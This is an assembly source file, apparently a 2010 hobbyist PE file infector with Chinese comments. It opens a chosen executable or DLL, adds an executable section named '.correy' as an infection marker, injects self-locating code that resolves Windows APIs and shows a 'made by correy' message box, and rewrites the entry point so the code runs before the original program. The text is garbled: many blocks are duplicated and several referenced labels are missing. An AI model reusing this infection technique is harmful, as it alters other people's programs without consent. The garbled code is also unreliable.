.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
include comdlg32.inc
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
include comdlg32.inc
includelib user32.lib
includelib kernel32.lib
includelib comdlg32.lib
includelib kernel32.lib
includelib comdlg32.lib
FilterString db "pe File (*.exe, *.dll)",0,"*.exe;*.dll",0,0
sectionname db ".correy ",0;新加节的名字。同时也是感染标志。
Characteristics dword 0e0000020h ;新加节的属性。
wrong db "节头后面有数据,添加节失败。",0
infect db "文件已经感染!",0
FilterString db "pe File (*.exe, *.dll)",0,"*.exe;*.dll",0,0
sectionname db ".correy ",0;新加节的名字。同时也是感染标志。
Characteristics dword 0e0000020h ;新加节的属性。
wrong db "节头后面有数据,添加节失败。",0
infect db "文件已经感染!",0
buffercmp db 40 dup (?)
buffer db 256 DUP (?)
mz dd ?
pe dd ?
OptionalHeader dd ?
header dd ?
sizeOfOptionalHeader dd ?
sizeofallheader dd ?
lsizeofallheader dd ?
sections dd ?
newheader dd ?;新添加节的节头的位置
lnewheader dd ? ;新添加节的节头的距离
hfile dd ?
lpe dd ? ;pe的距离
sectionalignment dd ?
filealignment dd ?
x dd ?
y dd ?
z dd ?
startwritecode dd ?
newsizeofrawdata dd ?
newsizeofcode dd ?
newsizeofimage dd ?
alignvirtualsize dd ?
oldaddressofentrypoint dd ?
newaddressofentrypoint dd ?
buffercmp db 40 dup (?)
buffer db 256 DUP (?)
mz dd ?
pe dd ?
OptionalHeader dd ?
header dd ?
sizeOfOptionalHeader dd ?
sizeofallheader dd ?
lsizeofallheader dd ?
sections dd ?
newheader dd ?;新添加节的节头的位置
lnewheader dd ? ;新添加节的节头的距离
hfile dd ?
lpe dd ? ;pe的距离
sectionalignment dd ?
filealignment dd ?
x dd ?
y dd ?
z dd ?
startwritecode dd ?
newsizeofrawdata dd ?
newsizeofcode dd ?
newsizeofimage dd ?
alignvirtualsize dd ?
oldaddressofentrypoint dd ?
newaddressofentrypoint dd ?
correy db "made by correy ",0
vdata db 0
vdata db 0
szGetProcAddress db "GetProcAddress",0
szLoadLibrary db 'LoadLibraryA',0
szUser32 db 'user32',0
szmessagebox db 'MessageBoxA',0
szLoadLibrary db 'LoadLibraryA',0
szUser32 db 'user32',0
szmessagebox db 'MessageBoxA',0
pel dd ?;
OptionalHeaderl dd ?;
headerl dd ? ;
sizeOfOptionalHeaderl dd ?;
sectionsl dd ?
nnps dd ?
e dd ?;
k dd ?;
apiaddress dd ?;
apinameaddress dd ?;
ordinaladdress dd ?;
apis dd ?
n dd ?;
i dd ?;
o dd ?;
f dd ?;
ob dd ?
ipapiloadlibrary dd ?
ipapiuser32 dd ?
ipapimessagebox dd ?
OptionalHeaderl dd ?;
headerl dd ? ;
sizeOfOptionalHeaderl dd ?;
sectionsl dd ?
nnps dd ?
e dd ?;
k dd ?;
apiaddress dd ?;
apinameaddress dd ?;
ordinaladdress dd ?;
apis dd ?
n dd ?;
i dd ?;
o dd ?;
f dd ?;
ob dd ?
ipapiloadlibrary dd ?
ipapiuser32 dd ?
ipapimessagebox dd ?
call rel
rel: pop ebx
sub ebx,rel
rel: pop ebx
sub ebx,rel
push [esp]
mov edi,[esp]
and edi,0ffff0000h
againk:push edi
cmp word ptr [edi],5a4dh
jne nextk
add edi,[edi+3ch]
cmp word ptr [edi],4550h
jne nextk
pop edi
mov eax,edi
jmp showk
nextk:pop edi
sub edi,10000h
jmp againk
showk:mov [ebx+k],eax;[ebx+]
add eax,3ch
mov eax,[eax]
add eax,[ebx+k]
mov [ebx+pel],eax
mov edi,[esp]
and edi,0ffff0000h
againk:push edi
cmp word ptr [edi],5a4dh
jne nextk
add edi,[edi+3ch]
cmp word ptr [edi],4550h
jne nextk
pop edi
mov eax,edi
jmp showk
nextk:pop edi
sub edi,10000h
jmp againk
showk:mov [ebx+k],eax;[ebx+]
add eax,3ch
mov eax,[eax]
add eax,[ebx+k]
mov [ebx+pel],eax
mov esi,[ebx+pel]
add esi,6
mov dx,word ptr [esi]
movsx edx,dx
mov [ebx+sectionsl],edx
add esi,6
mov dx,word ptr [esi]
movsx edx,dx
mov [ebx+sectionsl],edx
mov esi,[ebx+pel]
add esi,24
mov [ebx+OptionalHeaderl],esi ;保存可选头的地址。
add esi,24
mov [ebx+OptionalHeaderl],esi ;保存可选头的地址。
mov esi,[ebx+pel]
add esi,20
mov dx,word ptr [esi]
movsx edx,dx
mov [ebx+sizeOfOptionalHeaderl],edx
add esi,20
mov dx,word ptr [esi]
movsx edx,dx
mov [ebx+sizeOfOptionalHeaderl],edx
mov esi,[ebx+OptionalHeaderl ]
add esi,[ebx+sizeOfOptionalHeaderl]
mov [ebx+headerl],esi ;保存节头的地址。
add esi,[ebx+sizeOfOptionalHeaderl]
mov [ebx+headerl],esi ;保存节头的地址。
mov esi,[ebx+OptionalHeaderl]
add esi,96
mov esi,[esi]
mov edi,esi
add esi,96
mov esi,[esi]
mov edi,esi
add esi,[ebx+k]
add edi,[ebx+k]
mov [ebx+e],edi;导出节或导出目录表的首地址
add edi,[ebx+k]
mov [ebx+e],edi;导出节或导出目录表的首地址
mov edi,[ebx+e]
add edi,12
mov edi,[edi]
add edi,[ebx+k]
add edi,12
mov edi,[edi]
add edi,[ebx+k]
mov edi,[ebx+e]
add edi,16
mov edi,[edi]
mov [ebx+ob],edi
mov edi,[ebx+e]
add edi,20
mov edi,[edi]
mov [ebx+apis],edi
mov edi,[ebx+e]
add edi,24
mov edi,[edi]
mov [ebx+nnps],edi
add edi,16
mov edi,[edi]
mov [ebx+ob],edi
mov edi,[ebx+e]
add edi,20
mov edi,[edi]
mov [ebx+apis],edi
mov edi,[ebx+e]
add edi,24
mov edi,[edi]
mov [ebx+nnps],edi
mov edi,[ebx+e]
add edi,28
mov edi,[edi]
add edi,[ebx+k]
mov [ebx+apiaddress],edi ;导出地址表的首地址
add edi,28
mov edi,[edi]
add edi,[ebx+k]
mov [ebx+apiaddress],edi ;导出地址表的首地址
mov edi,[ebx+e]
add edi,32
mov edi,[edi]
add edi,[ebx+k]
mov [ebx+apinameaddress],edi ;导出名称指针表的首地址
add edi,32
mov edi,[edi]
add edi,[ebx+k]
mov [ebx+apinameaddress],edi ;导出名称指针表的首地址
mov edi,[ebx+e]
add edi,36
mov edi,[edi]
add edi,[ebx+k]
mov [ebx+ordinaladdress],edi ;导出序数表的首地址
add edi,36
mov edi,[edi]
add edi,[ebx+k]
mov [ebx+ordinaladdress],edi ;导出序数表的首地址
mov edx,[ebx+apinameaddress]
xor eax,eax
againke:push edx
mov edi,[edx]
add edi,[ebx+k]
mov edx,[ebx+apinameaddress]
xor eax,eax
againke:push edx
mov edi,[edx]
add edi,[ebx+k]
push eax
lea eax,[ebx+szGetProcAddress]
mov esi,eax
pop eax
lea eax,[ebx+szGetProcAddress]
mov esi,eax
pop eax
mov ecx,14;GetProcAddress字符的长度。
repe cmpsb
je nextke
pop edx
add edx,4
inc eax
jmp againke
nextke:add eax,[ebx+ob];加上基数
mov [ebx+i],eax
repe cmpsb
je nextke
pop edx
add edx,4
inc eax
jmp againke
nextke:add eax,[ebx+ob];加上基数
mov [ebx+i],eax
mov eax,[ebx+i]
mov edx,[ebx+ordinaladdress]
shl eax,1
add eax,edx
movzx eax,word ptr [eax]
mov [ebx+o],eax
mov eax,[ebx+i]
mov edx,[ebx+ordinaladdress]
shl eax,1
add eax,edx
movzx eax,word ptr [eax]
mov [ebx+o],eax
mov eax,[ebx+o]
sub eax,[ebx+ob];减去基数
mov edx,[ebx+apiaddress]
shl eax,2
add eax,edx
mov eax,[eax]
add eax,[ebx+k]
mov [ebx+f],eax
mov eax,[ebx+o]
sub eax,[ebx+ob];减去基数
mov edx,[ebx+apiaddress]
shl eax,2
add eax,edx
mov eax,[eax]
add eax,[ebx+k]
mov [ebx+f],eax
lea eax,[ebx+szLoadLibrary]
push eax
push [ebx+k]
call [ebx+f];eax
mov [ebx+ipapiloadlibrary],eax
lea eax,[ebx+szLoadLibrary]
push eax
push [ebx+k]
call [ebx+f];eax
mov [ebx+ipapiloadlibrary],eax
lea eax,[ebx+szUser32]
push eax
call [ebx+ipapiloadlibrary]
mov [ebx+ipapiuser32],eax
lea eax,[ebx+szUser32]
push eax
call [ebx+ipapiloadlibrary]
mov [ebx+ipapiuser32],eax
lea eax,[ebx+szmessagebox]
push eax
push [ebx+ipapiuser32]
call [ebx+f]
mov [ebx+ipapimessagebox],eax
lea eax,[ebx+szmessagebox]
push eax
push [ebx+ipapiuser32]
call [ebx+f]
mov [ebx+ipapimessagebox],eax
push 0
lea eax,[ebx+correy]
push eax
push eax
push 0
call [ebx+ipapimessagebox]
push 0
lea eax,[ebx+correy]
push eax
push eax
push 0
call [ebx+ipapimessagebox]
db 0e9h
db 0e9h
dd ?
dd ?
vendcode dd ?
alignit proc sizes,aligns
push edx
mov eax,sizes
xor edx,edx
div aligns
cmp edx,0
je next
inc eax
next:mul aligns
pop edx
alignit endp
push edx
mov eax,sizes
xor edx,edx
div aligns
cmp edx,0
je next
inc eax
next:mul aligns
pop edx
alignit endp
mov ofn.lStructSize,SIZEOF ofn
mov ofn.lpstrFilter, OFFSET FilterString
mov ofn.lpstrFile, OFFSET buffer
mov ofn.nMaxFile,512
mov ofn.Flags,00281804h
invoke GetOpenFileName, ADDR ofn
invoke CreateFile,addr buffer,0c0000000h,3,0,3,80h,0
mov hfile,eax
invoke CreateFileMapping,eax,0,2,0,0,0
invoke MapViewOfFile,eax,4,0,0,0
mov mz,eax
mov ofn.lStructSize,SIZEOF ofn
mov ofn.lpstrFilter, OFFSET FilterString
mov ofn.lpstrFile, OFFSET buffer
mov ofn.nMaxFile,512
mov ofn.Flags,00281804h
invoke GetOpenFileName, ADDR ofn
invoke CreateFile,addr buffer,0c0000000h,3,0,3,80h,0
mov hfile,eax
invoke CreateFileMapping,eax,0,2,0,0,0
invoke MapViewOfFile,eax,4,0,0,0
mov mz,eax
mov esi,mz
add esi,3ch
mov esi,[esi]
mov lpe,esi
mov eax,mz
add esi,eax
mov pe,esi;"pe"的位置。
add esi,3ch
mov esi,[esi]
mov lpe,esi
mov eax,mz
add esi,eax
mov pe,esi;"pe"的位置。
mov esi,pe
add esi,6
mov dx,word ptr [esi]
movsx edx,dx
mov sections,edx;节的数目。
add esi,6
mov dx,word ptr [esi]
movsx edx,dx
mov sections,edx;节的数目。
mov esi,pe
add esi,24
mov OptionalHeader,esi ;可选头的地址。
add esi,24
mov OptionalHeader,esi ;可选头的地址。
mov esi,pe
add esi,40
mov esi,[esi]
mov oldaddressofentrypoint,esi ;原来程序的入口点
add esi,40
mov esi,[esi]
mov oldaddressofentrypoint,esi ;原来程序的入口点
mov esi,pe
add esi,20
mov dx,word ptr [esi]
movsx edx,dx
mov sizeOfOptionalHeader,edx;可选头的大小。
add esi,20
mov dx,word ptr [esi]
movsx edx,dx
mov sizeOfOptionalHeader,edx;可选头的大小。
mov esi,pe
add esi,84
mov esi,[esi]
mov sizeofallheader,esi ;pe文件头的大小
add esi,84
mov esi,[esi]
mov sizeofallheader,esi ;pe文件头的大小
mov eax,mz
add eax,sizeofallheader
mov lsizeofallheader,eax;第一个节的位置,也就是文件头的尾部。
add eax,sizeofallheader
mov lsizeofallheader,eax;第一个节的位置,也就是文件头的尾部。
mov esi,pe
add esi,56
mov esi,[esi]
mov sectionalignment,esi ;节对齐的尺寸。
add esi,56
mov esi,[esi]
mov sectionalignment,esi ;节对齐的尺寸。
mov esi,pe
add esi,60
mov esi,[esi]
mov filealignment,esi ;文件对齐的尺寸。
add esi,60
mov esi,[esi]
mov filealignment,esi ;文件对齐的尺寸。
mov esi,OptionalHeader
add esi,sizeOfOptionalHeader
mov header,esi ;保存节头的地址。
add esi,sizeOfOptionalHeader
mov header,esi ;保存节头的地址。
mov eax,40
mov ebx,sections
mul ebx
add eax,header
mov newheader,eax;预定新添加节的节头的位置
sub eax,mz
mov lnewheader,eax
mov ebx,sections
mul ebx
add eax,header
mov newheader,eax;预定新添加节的节头的位置
sub eax,mz
mov lnewheader,eax
mov eax,newheader
sub eax,40
mov esi,eax
lea edi,sectionname
mov ecx,8
repe cmpsb
je infected
mov eax,newheader
sub eax,40
mov esi,eax
lea edi,sectionname
mov ecx,8
repe cmpsb
je infected
lea esi,buffercmp
mov eax,mz
add eax,lnewheader
mov edi,eax
mov ecx,40
repe cmpsb
je startadd
lea esi,buffercmp
mov eax,mz
add eax,lnewheader
mov edi,eax
mov ecx,40
repe cmpsb
je startadd
jmp err
mov eax,lpe
add eax,6
invoke SetFilePointer,hfile,eax,0,0
inc sections
invoke WriteFile,hfile,addr sections,2,addr buffer,0
mov eax,lpe
add eax,6
invoke SetFilePointer,hfile,eax,0,0
inc sections
invoke WriteFile,hfile,addr sections,2,addr buffer,0
invoke SetFilePointer,hfile,lnewheader,0,0
invoke WriteFile,hfile,addr sectionname,8,addr buffer,0
invoke SetFilePointer,hfile,lnewheader,0,0
invoke WriteFile,hfile,addr sectionname,8,addr buffer,0
mov x,offset vendcode - offset correy
invoke WriteFile,hfile,addr x,4,addr buffer,0
mov x,offset vendcode - offset correy
invoke WriteFile,hfile,addr x,4,addr buffer,0
push sectionalignment
push x
call alignit
mov alignvirtualsize,eax
push x
call alignit
mov alignvirtualsize,eax
mov eax,newheader
sub eax,28
mov eax,[eax]
mov y,eax
mov eax,newheader
sub eax,28
mov eax,[eax]
mov y,eax
mov eax,newheader
sub eax,32
mov eax,[eax]
mov x,eax
sub eax,32
mov eax,[eax]
mov x,eax
push sectionalignment
push x
call alignit
add eax,y
mov y,eax
invoke WriteFile,hfile,addr y,4,addr buffer,0
push x
call alignit
add eax,y
mov y,eax
invoke WriteFile,hfile,addr y,4,addr buffer,0
push filealignment
push x
call alignit
mov newsizeofrawdata,eax
invoke WriteFile,hfile,addr newsizeofrawdata,4,addr buffer,0
push filealignment
push x
call alignit
mov newsizeofrawdata,eax
invoke WriteFile,hfile,addr newsizeofrawdata,4,addr buffer,0
mov eax,newheader
sub eax,20
mov eax,[eax]
mov x,eax
mov eax,newheader
sub eax,24
mov eax,[eax]
add eax,x
mov startwritecode,eax
invoke WriteFile,hfile,addr startwritecode,4,addr buffer,0
mov eax,newheader
sub eax,20
mov eax,[eax]
mov x,eax
mov eax,newheader
sub eax,24
mov eax,[eax]
add eax,x
mov startwritecode,eax
invoke WriteFile,hfile,addr startwritecode,4,addr buffer,0
mov eax,lnewheader
add eax,36
invoke SetFilePointer,hfile,eax,0,0
invoke WriteFile,hfile,addr Characteristics,4,addr buffer,0
mov eax,lnewheader
add eax,36
invoke SetFilePointer,hfile,eax,0,0
invoke WriteFile,hfile,addr Characteristics,4,addr buffer,0
mov eax,pe
add eax,28
mov eax,[eax]
add eax,newsizeofrawdata;alignvirtualsize;
mov newsizeofcode,eax
mov ebx,lpe
add ebx,28
invoke SetFilePointer,hfile,ebx,0,0
invoke WriteFile,hfile,addr newsizeofcode,4,addr buffer,0
mov eax,pe
add eax,28
mov eax,[eax]
add eax,newsizeofrawdata;alignvirtualsize;
mov newsizeofcode,eax
mov ebx,lpe
add ebx,28
invoke SetFilePointer,hfile,ebx,0,0
invoke WriteFile,hfile,addr newsizeofcode,4,addr buffer,0
mov eax,pe
add eax,80
mov eax,[eax]
add eax,alignvirtualsize;newsizeofrawdata
mov newsizeofimage,eax
mov ebx,lpe
add ebx,80
invoke SetFilePointer,hfile,ebx,0,0
invoke WriteFile,hfile,addr newsizeofimage,4,addr buffer,0
mov eax,pe
add eax,80
mov eax,[eax]
add eax,alignvirtualsize;newsizeofrawdata
mov newsizeofimage,eax
mov ebx,lpe
add ebx,80
invoke SetFilePointer,hfile,ebx,0,0
invoke WriteFile,hfile,addr newsizeofimage,4,addr buffer,0
mov eax,lpe
add eax,40
invoke SetFilePointer,hfile,eax,0,0
mov eax,y
add eax,offset vstartcode - offset correy
mov newaddressofentrypoint,eax
invoke WriteFile,hfile,addr newaddressofentrypoint,4,addr buffer,0
mov eax,lpe
add eax,40
invoke SetFilePointer,hfile,eax,0,0
mov eax,y
add eax,offset vstartcode - offset correy
mov newaddressofentrypoint,eax
invoke WriteFile,hfile,addr newaddressofentrypoint,4,addr buffer,0
invoke SetFilePointer,hfile,startwritecode,0,0
invoke WriteFile,hfile,addr correy,offset vendcode - offset correy,addr buffer,0
invoke SetFilePointer,hfile,startwritecode,0,0
invoke WriteFile,hfile,addr correy,offset vendcode - offset correy,addr buffer,0
mov eax,newsizeofrawdata
add eax,startwritecode
push eax
invoke SetFilePointer,hfile,eax,0,0
add eax,startwritecode
push eax
invoke SetFilePointer,hfile,eax,0,0
pop eax
sub eax,sizeof correy
invoke SetFilePointer,hfile,eax,0,0
invoke WriteFile,hfile,addr correy,sizeof correy,addr buffer,0
sub eax,sizeof correy
invoke SetFilePointer,hfile,eax,0,0
invoke WriteFile,hfile,addr correy,sizeof correy,addr buffer,0
mov eax,startwritecode
add eax,offset oldentry - offset correy
invoke SetFilePointer,hfile,eax,0,0
mov eax,y
add eax,offset vendcode - offset correy ;+ 5 jmptoold
sub oldaddressofentrypoint,eax
invoke WriteFile,hfile,addr oldaddressofentrypoint,4,addr buffer,0
mov eax,startwritecode
add eax,offset oldentry - offset correy
invoke SetFilePointer,hfile,eax,0,0
mov eax,y
add eax,offset vendcode - offset correy ;+ 5 jmptoold
sub oldaddressofentrypoint,eax
invoke WriteFile,hfile,addr oldaddressofentrypoint,4,addr buffer,0
invoke FlushFileBuffers,hfile
invoke CloseHandle,hfile
jmp exit
invoke CloseHandle,hfile
jmp exit
invoke MessageBox,0,addr infect,0,0
jmp exit
invoke MessageBox,0,addr infect,0,0
jmp exit
invoke MessageBox,0,addr wrong,0,0
invoke MessageBox,0,addr wrong,0,0
invoke ExitProcess,NULL
end start
;made at 2010.07.16
invoke ExitProcess,NULL
end start
;made at 2010.07.16